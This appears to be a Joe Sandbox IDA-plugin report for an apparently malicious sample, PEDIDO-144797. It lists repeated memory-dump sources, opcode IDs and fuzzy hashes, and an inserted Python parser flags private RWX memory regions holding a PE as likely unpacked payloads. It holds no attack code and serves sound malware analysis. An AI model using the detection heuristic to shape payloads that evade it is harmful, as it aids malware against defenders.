                                                                                                                                          • Instruction ID: 3ce71409a6668ebd061b18a8b2a1bd518e5dc65683f8c93dab25c5ef670b6cf5
                                                                                                                                          • Opcode Fuzzy Hash: afebe6efd65acbc4c67c430df805e791ad176ba62eef8b3e38408127a78406e6
                                                                                                                                          • Instruction Fuzzy Hash: FCF08270A41248ABDF04DBB9D555F6E77B9AF08704F500498A501EB280EAB4D900C758
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 361c29e99bbae66c9eb25112443f37eac62420ec480be7a1c2cf3f348cde0597
                                                                                                                                          • Instruction ID: eec75a854e1919c141c73ca754bed291e2b83bc3f4305144db2b63fb27177019
                                                                                                                                          • Opcode Fuzzy Hash: 361c29e99bbae66c9eb25112443f37eac62420ec480be7a1c2cf3f348cde0597
                                                                                                                                          • Instruction Fuzzy Hash: 3EF02735D11754EFEB11C729D154B017BE5BF00BB4F0A80A1D8189F901C770ED40C291
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9be90d9bdd3039c633eedc91e65be9168b8a5b9f3f4c9e6b98fd00c5b0707661
                                                                                                                                          • Instruction ID: 3a85b8640a36703b3f6393adef87e33cc88ec6c4ca7cb22609f8c87b45640132
                                                                                                                                          • Opcode Fuzzy Hash: 9be90d9bdd3039c633eedc91e65be9168b8a5b9f3f4c9e6b98fd00c5b0707661
                                                                                                                                          • Instruction Fuzzy Hash: 3BF08C74A41248EBDB04DBB9D94AE9EB7B8EF09708F500498E602EB280DAB4D941C759
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e41c75863097591e8ae8cdc4b324b0f106e6777e025bb6c75a4d2feb017e6009
                                                                                                                                          • Instruction ID: 9d3b2e1b5333150406ed68820f4a372ea31e4cc52ff68c5a59bfbf28b0081c1a
                                                                                                                                          • Opcode Fuzzy Hash: e41c75863097591e8ae8cdc4b324b0f106e6777e025bb6c75a4d2feb017e6009
                                                                                                                                          • Instruction Fuzzy Hash: A2F08C70A41248EBDB04CBA9C54AA9EB7F8AF09704F500098E502FB280EAB8E941C719
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cbd6acd406adc9069e3c0a794c66009efcf6a8930d19d8f3cc31aab0ab820193
                                                                                                                                          • Instruction ID: cc901f7227949158a2718a1ab492ee69bdeb4647f061e520415f4fcae221660b
                                                                                                                                          • Opcode Fuzzy Hash: cbd6acd406adc9069e3c0a794c66009efcf6a8930d19d8f3cc31aab0ab820193
                                                                                                                                          • Instruction Fuzzy Hash: D6E092B26429216BD3115A19AC00FA6739DEFD4B50F090475E504D7224DA68DD02C7E5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                                          • Instruction ID: 5660f951eaaacf1a843dc60ee83a0b84ca8a8bbe461368501c259b44bcfa080c
                                                                                                                                          • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                                          • Instruction Fuzzy Hash: 08F0A0B92047509BDB09CE16C050B897BA4AF953A4B100095EC058B312DB72FC91C795
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                          • Instruction ID: a075fb4ae7fa636a66a0011f528e7a9b5ef2df63d7330c72a0c94c1b06daae13
                                                                                                                                          • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                          • Instruction Fuzzy Hash: 99E0ED33141719ABD7290A0ACC04F02BB69FF907B1F00822AE92817990CAB0F811CAE4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                                                                          • Instruction ID: 275a2fc843fba486eb47d73221d96d0ed00d67ef75f6a6a4ca5b45285df7cdb6
                                                                                                                                          • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                                                                          • Instruction Fuzzy Hash: 1CE065B2210200BBEB25DB58CD01FA673ADEF90724F500258B126960D0DEF0FE40CA64
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
• Instruction ID: ec24f87d7350a7bb8466da5731d0af78f407f1730adbb8024598483b73e0d391
• Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
• Instruction Fuzzy Hash: 52E08C32041611EEFB391A24EC00F8176A2EF44750F20146AE087060A88EF59881EA4D
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
• Instruction ID: 34d60d88ff3ae6d0217af39afcb5599e92f6242698d2e50cbfb04245d657034c
• Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
• Instruction Fuzzy Hash: 57D0A932204610ABDB32AA1CFC00FC333E9BF88B21F020459B009CB050C3A4EC82C684
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
• Instruction ID: 6f46b3a79da7fd3df63535105bf46090d0f08bb244053bdf34256538db326cde
• Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
• Instruction Fuzzy Hash: 03D022322020B093CF2C26416D14F937945DF84BA8F06002C380983800CC108C42C2E0
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
• Instruction ID: d7ad18de7bcd85ac06d5b7e21d21f3db46d158eeec0d56596e30dc118ffbe33e
• Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
• Instruction Fuzzy Hash: 76D012371D054CBBCF119F66DC01F957BA9EBA4B60F444020B504875A0CA7AE960D684
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction ID: 3b84e8757cf68de126d80de89f466bbf30b8706d25223db9bf58d313b1b1355f
• Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
• Instruction Fuzzy Hash: 04D0E979352D80DFD61ACB59C9A4B0573A4BB44B84FC14590E801CB762D66CE944CA14
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
• Instruction ID: 6354315c48536c259515a6967dea527c947fff313f2ea6918728d740718ec356
• Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
• Instruction Fuzzy Hash: 1FC01232250644AFCB119A95CD01F0177A9EB98B00F000021F20447570C571E820D648
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction ID: 77514b0c57de48810f6dc34b183a57333ab8964a25c22981562e0d4b1d758e5c
• Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
• Instruction Fuzzy Hash: 8DD0123610064CEFCB01DF40C890D6A772AFFC8B10F108019FD19076148A75ED62DA54
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
• Instruction ID: fd7a8cea1fe1943774de0fde53fc3581adb69649469470721d5fb2fbcc6c26f1
• Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
• Instruction Fuzzy Hash: 9EC08CB82412C06AEF1A6B00C950B283A54EFC0B49FC0019CAE081D4A1CBABD8218308
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
• Instruction ID: 60ab404ad855bea224004c804e234842938aa794b8d974ec855d474bb4c20a00
• Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
• Instruction Fuzzy Hash: 39C00139781A408FDE0ACA6AC284B097BE8BB84B81F150890E8058BA21E6A5E850CA11
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 465b8f5f3bbcaabceff720cb9d580f82b0f33b8a8ea8f3a32eb267ec08474938
• Instruction ID: 87b85a10cda1129e5f6a78879535ad158960be367c63f78bb08b7f9b802094b3
• Opcode Fuzzy Hash: 465b8f5f3bbcaabceff720cb9d580f82b0f33b8a8ea8f3a32eb267ec08474938
• Instruction Fuzzy Hash: 32900231605500229D40755C5B8455650055BE0311B51D456E0524914CCA25896A6361
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 115e1b5a2b58918ad73c6f29e2bfd7f5a7787e73d720cacbbccc84fa8f49120f
• Instruction ID: 44b9ebee561c61a71636ffa9ab37360909bc0e5f2e88f3c31ff23588e3256f2b
• Opcode Fuzzy Hash: 115e1b5a2b58918ad73c6f29e2bfd7f5a7787e73d720cacbbccc84fa8f49120f
• Instruction Fuzzy Hash: 8A900261601200524D40755C5B0441670055BE1311391D55AA0654920CC6298869A269
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fbdf8c1589341435682e5a7b3d762861317e3cdc73a8d7238399bb792d80dbf
• Instruction ID: f2399331a07600102e76f3bd24cd882269ec65dbdcf3b3af6a0937de738dd134
• Opcode Fuzzy Hash: 9fbdf8c1589341435682e5a7b3d762861317e3cdc73a8d7238399bb792d80dbf
• Instruction Fuzzy Hash: 2A900225221100120D45A95C170451B14455BD6361391D45AF1516950CC63288796321
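The .sdmp names in the Memory Dump Source lines above encode where each dumped region sat in the process and how it was mapped. The parser below is an added example written for this page, not Joe Sandbox code: it pulls the function entries out of a listing in this layout, decodes the dump name into base address, page protection, state and type, and flags regions that are committed, private, writable and executable and carry a PE, which is the shape an unpacked or injected payload has. The field layout assumed for the .sdmp name (process index, snapshot index, dump id, base, protect, state, type, reserved) is an assumption inferred from the page's values lining up with the Windows MEMORY_BASIC_INFORMATION constants; the constant values themselves are the documented winnt.h ones. The sample text is two entries copied from this report, with the page's "Download File" link residue left in to show the parser tolerates it.

```python
# Added example (not Joe Sandbox code): parse the "Memory Dump Source" entries of a
# Joe Sandbox IDA-plugin listing and decode what the .sdmp name says about the region.
# Assumption: the .sdmp name is laid out as
#   <proc idx>.<snapshot idx>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
# inferred from the page's values matching MEMORY_BASIC_INFORMATION Protect/State/Type.
import re
from dataclasses import dataclass, field

PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SDMP_RE = re.compile(
    r"(?P<proc>[0-9a-f]{8})\.(?P<snap>[0-9a-f]{8})\.(?P<dump>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\.(?P<mtype>[0-9a-f]{8})"
    r"\.(?P<reserved>[0-9a-f]{8})\.sdmp", re.IGNORECASE)

@dataclass(frozen=True)
class Region:
    process_index: int
    snapshot_index: int
    base: int
    protect: int
    state: int
    mem_type: int

    def describe(self) -> str:
        return "|".join((PAGE_PROTECT.get(self.protect, hex(self.protect)),
                         MEM_STATE.get(self.state, hex(self.state)),
                         MEM_TYPE.get(self.mem_type, hex(self.mem_type))))

    def is_rwx_private(self) -> bool:
        # Committed, private (not file-backed) memory that is writable and executable:
        # what an unpacker or injector leaves behind.  A loaded module is MEM_IMAGE.
        return self.protect == 0x40 and self.state == 0x1000 and self.mem_type == 0x20000

def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.search(name)  # search(): tolerates the "Download File" link residue
    if m is None:
        raise ValueError("not a Joe Sandbox .sdmp name: %r" % name)
    return Region(int(m["proc"], 16), int(m["snap"], 16), int(m["base"], 16),
                  int(m["protect"], 16), int(m["state"], 16), int(m["mtype"], 16))

@dataclass
class FunctionEntry:
    source: Region
    based_on_pe: bool
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""
    associated: list = field(default_factory=list)

def parse_entries(text: str) -> list:
    """One FunctionEntry per 'Memory Dump Source' block; unrelated lines are skipped."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("Source File:"):
            m = re.search(r"Source File:\s*(\S+\.sdmp),.*based on PE:\s*(true|false)", line)
            cur = FunctionEntry(parse_sdmp(m.group(1)), m.group(2) == "true")
        elif cur is None:
            continue
        elif line.startswith("Associated:"):
            cur.associated.append(parse_sdmp(line))
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):  # last field closes the block
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur = None
    return entries

def suspicious_regions(entries) -> dict:
    """(process index, base) -> functions found in each RWX private region carrying a PE."""
    counts = {}
    for e in entries:
        if e.based_on_pe and e.source.is_rwx_private():
            key = (e.source.process_index, e.source.base)
            counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed sample: two entries copied from the report above, link residue included.
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
• Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
• Instruction Fuzzy Hash: 52E08C32041611EEFB391A24EC00F8176A2EF44750F20146AE087060A88EF59881EA4D
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
• Instruction Fuzzy Hash: 57D0A932204610ABDB32AA1CFC00FC333E9BF88B21F020459B009CB050C3A4EC82C684
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(hex(e.source.base), e.source.describe(), e.based_on_pe, e.opcode_id[:16])
    print(suspicious_regions(parse_entries(SAMPLE)))
```

Run against the two sample entries this reports process index 2, base 0x32670000, PAGE_EXECUTE_READWRITE|MEM_COMMIT|MEM_PRIVATE with a PE based at that address. A module the loader mapped from disk would show up as MEM_IMAGE with read/execute code pages, so a PE-backed region that is private and RWX is the one to dump and scan on its own rather than trusting the original file on disk; the same decoding applies to every other .sdmp name in the listing, and counting functions per region shows which dump the plugin's analysis is concentrated in.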
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61625ba9e73deb608cf333394f0e750bbedb5a3df0ba7ba88dba7e619d27ce6a
• Instruction ID: de8cdb30b8fd03ef77649d9c7b900b856197985b9fe5ad412684291355dcfa8c
• Opcode Fuzzy Hash: 61625ba9e73deb608cf333394f0e750bbedb5a3df0ba7ba88dba7e619d27ce6a
• Instruction Fuzzy Hash: BF90023160510812DD50755C571475610054BD0311F51D456A0124A14DC7668A6976A1
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 97a5eaa5b3dbc3f1153c6d0ea5aca54e5074173dbd8b6d4ddf62007d97be0c65
• Instruction ID: 8dce1c291ddb576e133de9313ce800cef1032afad127ba3e53ae0084721c083a
• Opcode Fuzzy Hash: 97a5eaa5b3dbc3f1153c6d0ea5aca54e5074173dbd8b6d4ddf62007d97be0c65
• Instruction Fuzzy Hash: 0390023120110812DD04655C5B0469610054BD0311F51D456A6124A15ED67688A57131
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8f33c2ff33e708520280c8d815a241d43c31d02540b503506891ac92ca71284
• Instruction ID: f280eef56e539eda7b592eb11ad84412f05eef261fd1010a660cba41bba1b962
• Opcode Fuzzy Hash: a8f33c2ff33e708520280c8d815a241d43c31d02540b503506891ac92ca71284
• Instruction Fuzzy Hash: 2E900261202100134D05755C5714626500A4BE0211B51D466E1114950DC53688A57125
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e2a5ee99b78003b234342999304e5b8e1d7dad63702a57cdc5c9667d93ea668
• Instruction ID: f16e8b2717cbb4e9bd564078ac18f9d352f3b66841215c64ac1d577f620bf045
• Opcode Fuzzy Hash: 4e2a5ee99b78003b234342999304e5b8e1d7dad63702a57cdc5c9667d93ea668
• Instruction Fuzzy Hash: 2290023120514852DD40755C5704A5610154BD0315F51D456A0164A54DD6368D69B661
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13824fb9fe6f770ab6858871dd403ae07ce01029fcdf53fc6c00bc7824860a06
